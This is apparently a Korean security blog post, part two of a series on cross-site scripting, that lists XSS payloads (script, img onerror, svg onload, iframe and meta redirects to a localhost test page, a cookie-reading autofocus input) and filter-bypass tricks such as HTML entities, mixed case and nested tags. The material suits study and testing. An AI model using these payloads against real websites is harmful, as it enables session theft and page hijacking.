본문 바로가기

security/취약점 분석

[웹 취약점] Cross-Site Scripting(XSS) 취약점의 정의 및 대응 방안2

■ XSS 공격 구문(태그)

1.  <script>alert(1)</script>  and <<script>alert(1);//<</SCRIPT>
※<script>태그 : HTML에 클라이언트 스크립트를 추가할 때 사용

2. <img src="#" onerror="alert(1)">
    <img """><script>alert(1)</script>">
※<img>태그 : 웹 페이지에서 이미지를 나타낼 수 있는 태그

3. <iframe src="http://localhost/test/main/xss.php"></iframe>
※<iframe>태그 : 웹 페이지 안에 다른 html파일을 불러와서 삽입

4. <embed src="http://localhost/test/main/xss.php">
※<embed>태그 : 외부 콘텐츠를 포함시킬 수 있는 컨테이너를 정의(*PDF 등)

5. <object width="400" height="400" data="http://localhost/test/main/xss.php"></object>
※<object>태그 : 멀티미디어를 웹 페이지에 삽입할 수 있음(*오디오, 비디오, 자바 애플릿, 액티브x, 플래시 등)

6. <meta http-equiv="refresh" content="0; url=http://localhost/test/main/xss.php">
※<meta>태그 : 해당 문서에 대한 정보인 메타데이터를 정의

7. <a onmouseover="alert(1)">  (*b태그도 사용됨)

8. <input type="text" onfocus="alert(document.cookie)" autofocus>


9. <svg/onload=alert('XSS')>
: 벡터 기반 그래픽을 XML 형식으로 정의하는 그래픽을 담기 위한 태그

=> 공격 구문은 엄청나게 많음. <script>태그만이 xxs전부가 아님

 


■ XSS 공격 구문

* 이벤트 핸들러란 특정 요소에서 발생하는 이벤트를 처리하기 위해 존재하는 콜백 형태의 핸들러 함수이다.

 

1. <script>alert(1)</script>


2. <script> location="http://localhost/test/main/xss.php";</script>


3. <script>prompt(1)</script>


4. <script>confirm(1)</script>

5. on 이벤트 핸들러(onload, onerror, onfocus onmouseover 등 매우 많음)


■ XSS 공격 대응방안 우회

1. 입력검증 우회
< HTML Entity 사용>
- 특수문자 변환 [<] , [>] => &lt; , &gt;
- 문자열 변환 : 
   ex) <img src=# onerror=&#97;lert(document.&#99;ookie)>

<대소문자 혼용사용> *윈도우x 리눅스o
- <ScRiPt>alert('1')</ScRiPt>

<단어 필터링 시>
- <scr<script>ipt>alert(1)</scr<script>ipt>

2. 이벤트 핸들러

- <script> , alert 등의 문자 필터실 시 다른 이벤트 핸들러 사용
   ex) <img> , confirm 등

3. 경로/URL 사용
- <a href="javascript:alert('1')">XSS</a>
- <iframe src="http://localhost/test/main/xss.php"></iframe>


■ 기타 지식
*src : 이미지 소스의 URL(경로) 명시
*onerror : 속성이 잘못된 경우 에러 표시
*http-equiv="refresh" : 해당문서를 새로고침
*onmouseover : 마우스 올리면 반응
*autofocus : 자동으로 포커스됨

 

그 외에도 너무나 많은 우회 기법이 존재한다. 그만큼 취약하다는 뜻이기도 한듯.